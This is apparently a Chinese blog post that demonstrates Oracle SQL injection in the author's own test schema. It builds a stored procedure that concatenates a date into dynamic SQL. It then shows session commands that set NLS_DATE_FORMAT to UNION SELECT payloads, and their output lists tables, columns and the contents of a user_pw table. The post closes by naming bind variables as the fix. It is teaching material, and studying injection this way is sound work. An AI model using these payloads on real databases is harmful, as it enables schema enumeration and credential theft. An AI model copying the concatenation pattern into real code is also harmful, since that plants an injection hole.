oracle在线注入测试,oracle sql注入测试

这两天看看了TOM大师的书,一开始就讲到了sql注入,对于我们这种“邪恶”的程序员当然要研究研究,所以记录了模拟的过程。也通过模拟的过程了解了什么是SQL注入。

1,创建过程

在test用户下

create or replace procedure inject(var_date in date)

--AUTHID CURRENT_USER  如果添加上这个关键词,也可以减少sql注入问题,不过这个对调用用户的权限必须仔细,否则会出现权限问题。

is

/*

功能:测试SQL注入攻击

时间:2012-08-07

*/

v_rec all_users%rowtype;

v_course sys_refcursor;

v_query long;

begin

v_query:='select * from all_users where created='''||var_date||'''';--这一步就是“罪魁祸首”了

dbms_output.put_line(v_query);

open v_course for v_query;

for i in 1..100 loop

fetch v_course into v_rec;

exit when v_course%notfound;

dbms_output.put_line(v_rec.username||'.......');

end loop;

null;

close v_course;

end inject;

2,授权给scott用户执行

SQL> grant execute on test.inject to scott;

3,邪恶的程序员(scott)对过程进行分析,找到弱点,及''空可以为时间并对sql进行拼接

SQL> set serveroutput on   这一步为在sqlplus下显示dbms_output的结果

SQL> alter session set nls_date_format ='"''union select tname,0,null from tab--"';

SQL> exec test.inject(sysdate);

select * from all_users where created=''union select tname,0,null from tab--'

ADD_YEARPLAN.......

BIG_TABLE.......

CLASS.......

CLASS_COURSE.......

CLASS_PROCESS.......

COURSE.......

RUN_STATS.......

STATS.......

STATUS.......

STUDENT.......

STUDENT_COURSE.......

T1.......

T2.......

TEACHER.......

TEST.......

TEST_A.......

USER_PW.......

YEARPLAN_PROCESS.......

YEAR_PLAN.......

这其中包括了scott用户下的表和test用户下的表,这样你就可以通过你的才智找到test下的表,但是你没有权限查看,也不知道表中具体的列名。所以还得继续修改时间格式和执行那个存储过程。

SQL> alter session set nls_date_format ='"''union select tname||cname,0,null from col--"';

Session altered

SQL>  exec test.inject(sysdate);

select * from all_users where created=''union select tname||cname,0,null from col--'

ADD_YEARPLANADDCONTENT.......

ADD_YEARPLANADDDATE.......

ADD_YEARPLANADDREASON.......

ADD_YEARPLANADDYEARPLAN_ID.......等等

这样就知道具体的列名了,要想获得列的值还的在这样来一次

SQL> alter session set nls_date_format ='"''union select uname,0,null from user_pw--"';

Session altered

SQL>  exec test.inject(sysdate);

select * from all_users where created=''union select uname,0,null from user_pw--'

xionglang.......

这样就知道列中具体的内容了。呵呵,如果有什么password的啊!那你就赚到了。。。。

要解决这样的问题,TOM大师也说了,直接用绑定变量就可以有效的避免了。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值